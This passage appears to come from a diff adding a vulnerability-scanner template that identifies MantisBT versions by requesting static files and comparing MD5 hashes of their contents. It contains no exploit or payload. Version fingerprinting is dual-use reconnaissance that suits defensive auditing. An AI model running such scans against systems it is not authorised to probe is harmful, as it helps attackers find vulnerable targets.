2.5.2 + dsl: + - "(\"ca5bc802e0651ac299eb679f07866f4c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c608d833cba26560dab7844f65345b9d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - 
"(\"85a270165812a4ad54e1eef0ba45a01c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_breton.txt" + + matchers: + - type: dsl + name: 2.3.0 - 2.24.3 + dsl: + - "(\"ee758db7ec8f0c8ee0baab5d6cac6ac4\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"44b53cc23fc8a04bfc8d201d75614f14\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.1.3 + dsl: + - "(\"0b67848038f4f35d886767166ff36355\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"42b8412c51202132cee0d63b6e23f3e6\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"37b27ce9be1769c2e9470a21e3bb1523\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"3e4bf5eec12154b9a5dbcc68c7670fed\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"4ba5c1c5c20f29be11b95395b4715c49\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"adcbc94017084e39f20841578dbdcb54\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"a4aa49b578f4a321523cad38fd8c1b56\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"63c4ff65bc9c45857ff356c71a40b9f9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_hungarian.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.24.3 + dsl: + - "(\"851a2c37d75e83418aa8e01c61878daf\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.4.2 + dsl: + - "(\"47d2b62cbc54ebd2156422d8e5a9fa17\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"46674b880f45530f55750742b93f6165\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"101010ddabf3adedfefd8853acc6e8ee\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"4c52a5065064391aa0e9f5e0c6e91b50\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5ebea5a54f74999b1b6c20794e3f8d1b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"17ad7f7dc960f75539780722bb44417b\" == 
md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"26bab7865c7b6620f990f4571d19fd12\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"212cd2b49fd25b1d315f6f6038d5780d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_macedonian.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"0900f28563f71fffbe1d38890f3f59f8\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"858e3be8516196d689fa4eb70c13d80a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"bc3c13e82b9e4cccc3d34ed789f261ad\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"777d5c6f2bc34ed8ffbe3b408a4dcedf\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"3c8ae851f4933715a8e2f932bd4c6e57\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ef66b0ad90d0192a18e221a67c15ad9d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"51b36b3a599121a2c3e77423fe46ad85\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"7091b56660fb671b2d4d45caa6112c5b\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"aee08c6f5db3ed3bcda863fcb0a7dc44\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_basque.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"0feacbbeb92d4dd844059ae2bf622a53\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_english.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"1ce6b4d627841021127d6959f9b0390a\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"8c75871924437fc3e13e3a18ffffd675\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"019e27f46d166dfc3256581f5039b9f7\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"10bb22cb9125ce84d4b1b14f4d2989b4\" == md5(body))" + - type: dsl + 
name: 1.2.0 - 1.2.4 + dsl: + - "(\"bfa00b8fca0938d55b30849cd5a24529\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"dda9d4dd702eb21e787b31eace5e2aed\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"7ba1f77c16bccce9a3bd6b6c22460bb3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_bn.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"b28a1a09bd1384038644197a5981e04e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_shi.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"445bff125e0095bc90f4123c7eb074d0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_diq.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"105ac32dcf6af2067036ad35a608c7a7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lb.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"db05d0e638e5f1a458b1e85fb2e80922\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_hsb.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"beb3ab125bc3235bdf74e65c1254a784\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_afrikaans.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"e48eb6133198884f844f8c1e1c318c51\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"753e24c164c5125df56aef1809b455eb\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"710d1d89e434745f1276ef323e32acbb\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"cb27506f2da4f0e3edc6824562478e83\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0885826dc6d2bd6b5ea652248351757d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 
+ dsl: + - "(\"fd42473644f0f4a36287e8a1d77b80eb\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"291d38366ed9a39d9267828b7c5bbc82\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_zh-hk.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.24.3 + dsl: + - "(\"c510eb7d4d4fb00c4ee01bdd82a711b4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_dutch.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"fea1297edfdd0a2053d19fcfb5c7badc\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"740fcdc19aad56925e04ac992ef83559\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"193927332d7d2914cda54b197341d6f4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"cbb74cb09ea3a17bc634172d8210165c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"a28c7fbf5cb833059ae0aac83db696a9\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"b18e78613a57002a68db625fc8bbe308\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ffd7a009f4bc964173c29965095d2791\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"f9adcd64c3cd60007f61611172756efb\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"c710f0ddfe372dbac770948b8fb0b92a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_russian.txt" + + matchers: + - type: dsl + name: 2.3.0 - 2.16.1 + dsl: + - "(\"c1f09c4c09c4a167fc1ea041be6a0037\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.2.4 + dsl: + - "(\"04acb2dd5c2ac516f48989cd146b46fe\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"323f1013918fc27a67eb9d2f06b76161\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"930c0f21d2cead2807bfdacc6dc6545d\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - 
"(\"363e4683c8e2815c56b005254a065603\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c5c8ea844b12a6e8086cdfad31c08986\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1ac9abfcd9bf09630acd840e4312382d\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"2b47d79d8d21f46f990e32dcc10a81a0\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"5ebdf44e875ae1f1eec3b7aae2144956\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"6306251a69ff266a975742e4cf1b6e5a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_occitan.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"a3dfe8f9dd17063d18b664df68dddf71\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"946c64a30ef9af620da749a4ac122a36\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"3bb81641f1abec9ca915f93d1a20769e\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"584754ee29365dbb36f7dcf7803d9850\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a0775c89a29426995e34590041a0189d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"f871b6b58fbe254f749778635e2051bd\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"36dc76debec38c253d35902211e224f1\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"43bf65467232b90f9f63ceb6c7909c63\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_danish.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"0a57d7604efc7a94fc65888f171c91c5\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"e617009e813265e5a78e115546cd9f16\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6eb16027e397cba06561deca7b0f2c0d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"6a8b42b1221ea2609c3e3ecf6e747387\" 
== md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_volapuk.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"56fb00dd7ef43ed38f03ae096ab2fa23\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"e7ea5ad3748aa859c1c1a3104094ce81\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_estonian.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"88750ba4a95cac93292ab62da3a321f0\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"64378754f81bde65e35c2c72494a6d2b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"aaa160c7e0eef59c06a96934a9499c96\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"c3006e26d84c41bccd66265aad8bc93a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"b83b18acb337f4aef3091c978e120c5b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c5178978bab4792fe5423b20e73bf4d8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"72a12427b3582183c9b394b9e4d9a4a2\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"be07b842973a6ac2ebe7ed17c9c68cc1\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"63535714f45b893fd5cb3c1964ba5fe6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_pms.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.11.1 + dsl: + - "(\"96cb5bd0e47bd93bd8084957a61fa38d\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"dab4247ea1fbaad3faf5f74e263a1d72\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_basque.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"463eff7c5bcf0bae354b68eb05907f57\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_diq.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - 
"(\"40099f192db7e6d7639e4aaeac2b7073\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"63f0a0ac8e4e25492af90443fbe93d19\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"ea0554d4fcd60e0d8994a71e73212ec4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_lb.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.11.1 + dsl: + - "(\"f93dec68c192060839049290bc9e26e9\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"1b7e49a07466ea982e23129a3a614664\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_afrikaans.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"351937d046d677714afebb3454b5bd0c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/chart.bundle-2.1.6.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"3b380eb97c78234a96561966fad2a157\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/chart-2.1.6.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"1e8e9c1d385ae1dc4a399202c4f6dc33\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/TODO.tsk" + + matchers: + - type: dsl + name: 1.2.0 - 2.12.2 + dsl: + - "(\"88c7ccd500c967b9bc262bf3004c700b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/README" + + matchers: + - type: dsl + name: 1.3.0 - 2.12.2 + dsl: + - "(\"6c149822753f94a947c04d3a6ff734ad\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"4024f74c740ba9ce69904a0b0ef1224c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 2.8.0 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/LICENSE" + + matchers: + - type: dsl + name: 1.2.0 - 2.12.2 + dsl: + - "(\"a6f89e2100d9b6cdffcea4f398e37343\" == 
md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 2.12.2 + dsl: + - "(\"91d0f0026960ceb576e4d03b0c1dcd6f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/ChangeLog" + + matchers: + - type: dsl + name: 1.2.0 - 2.12.2 + dsl: + - "(\"c20529c9a04cf8598bdc7a757a4a155a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/rssbuilder/doc/changelog_rssbuilder.htm" + + matchers: + - type: dsl + name: 1.2.0 - 2.24.3 + dsl: + - "(\"d18962e08e9866e278fa1c88e926009d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/rssbuilder/doc/doc.css" + + matchers: + - type: dsl + name: 1.2.0 - 2.24.3 + dsl: + - "(\"bac24ba690bfb154d0214328886b3d18\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/rssbuilder/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 2.24.3 + dsl: + - "(\"846cbe1ecf0cd77fcd9ac8c9be881cba\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/rel_related.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"fc4effc89a2adb30d56ac23574bd2add\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"9e637c5a7dd1125fd4b8a9883703e079\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/favicon.ico" + + matchers: + - type: dsl + name: 1.2.9 - 2.24.3 + dsl: + - "(\"701bb703b31f99da18251ca2e557edf0\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.2.8 + dsl: + - "(\"ebe293e1746858d2548bca99c43e4969\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/rel_duplicate.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"c10a9d153ff42244d96574645b5a2958\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"a4577a9f7a4d931d72f2532c3b2b6261\" 
== md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/rel_dependant.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"67ced7af0bc90975d6a86deb960c48cd\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"2ffe64a0740a34fa2dc1f80a307cc8a6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/avatar.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"0bca52afdb2b9998132355d716390c9f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/LICENSE" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"b234ee4d69f5fce4486a80fdaf4a4263\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.2.20 + dsl: + - "(\"393a5ca445f6965873eca0259a17f833\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/ace-theme-license.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"5bd7f5a1e5e7f1bca0941bd9be8060c5\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"0cb175f442bd1d07ce75eb2c2ed9a788\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/tests/bootstrap.php.sample" + + matchers: + - type: dsl + name: 2.5.0 - 2.24.3 + dsl: + - "(\"bf1280348ac7b6b8d89658eac3cc2f61\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.4.2 + dsl: + - "(\"ed384dc5a4c72454622087a49ebcb0b1\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"3ae3e04f5eb5b535b786203f4312bc84\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/api/soap/mantisconnect.wsdl" + + matchers: + - type: dsl + name: 1.3.0 - 2.16.1 + dsl: + - "(\"5dd3b35ff44fd0d543b3c770a5fc03aa\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"ec9c1197c825d6f90b6f86ee1a585a86\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"eaf74c59497d268734bbc96701a578b4\" == md5(body))" 
+ - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"e7919bd7701401cb80d02b04cc45aae6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/api/soap/wsdl-viewer.xsl" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"63ab3c525412ec9ee161289f47623aa9\" == md5(body))" + - type: dsl + name: 1.2.20 - 2.5.2 + dsl: + - "(\"d09b7560a3a4b84c4d7a858aacbafb82\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.19 + dsl: + - "(\"801703503c552f056e835daacab89127\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/config/config_inc.php.sample" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d3db248f11ca75f42b4f7fcf9a82edec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/config/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-part2.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"b3f6cb894119452ffe2636a9e3b822cf\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"ba9854d732f48d34c3230bf0a5b50d5e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/login.css" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8acc5fa176915a30ad99f11b46ca7145\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/dropzone-4.3.0.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.19.1 + dsl: + - "(\"e2d1fa5c91f7937a4bf9bc1e10c95dca\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-rtl.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"f8bfc9a7398cedd48a836428e15b5d84\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"a9f7e87fcbe2393372bf71544d48cca0\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/css/font-awesome-4.6.3.min.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"4083f5d376eb849a458cc790b53ba080\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_diagonals-thick_20_666666_40x40.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d0cc3ffc3dc84d3a7c48867c75e2485f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_highlight-soft_75_ffe45c_1x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"53acc69aaee6e2cb73b2021317e24af3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_75_dadada_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c12c6510dad3ebfa64c8a30e959a2469\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_highlight-soft_75_cccccc_1x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"72c593d16e998952cd8d798fee33c6f3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_100_f6f6f6_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c17f552e8f4697d7608c57653af36df0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_ef8c08_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"772a64d6df4b93d230e9b38e1ab7522a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/pattern.jpg" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"94fbcaa1b6abb1a970bd9afb0814b85e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/icons-18-black.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"f9e3c93059ef0fc1ca1ead499f19d489\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_ffd27a_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"6686d21b904e18b100210169bb1c04ad\" == md5(body))" + + - method: GET + 
path: + - "{{BaseURL}}/css/images/ui-icons_cd0a0a_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3e450c2a2c66328d9498e7001ad7197c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_95_fef1ec_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"5a3be2d8fff8324d59aec3df7b0a0c83\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_diagonals-thick_18_b81900_40x40.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4d4e638960a1a29b0d6b693b445087da\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_gloss-wave_35_f6a828_500x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"23932de7c235b03187b8a5de3d024490\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_flat_10_000000_40x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c31d5fc3eb7d82c628a82e3b87024cd1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/icons-36-black.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"24bde6ae0459e200a2b2ac290787022d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_flat_75_ffffff_40x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8692e6efddf882acbff144c38ea7dfdf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_100_fdf5ce_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"fe58c3539111d3021776e6833169c5e1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ajax-loader.gif" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"08a3028fda91d443f4d5e93307c96fcd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-icons_888888_256x240.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"9c46d7cab43e22a14bad26d2d4806d80\" == md5(body))" + + - 
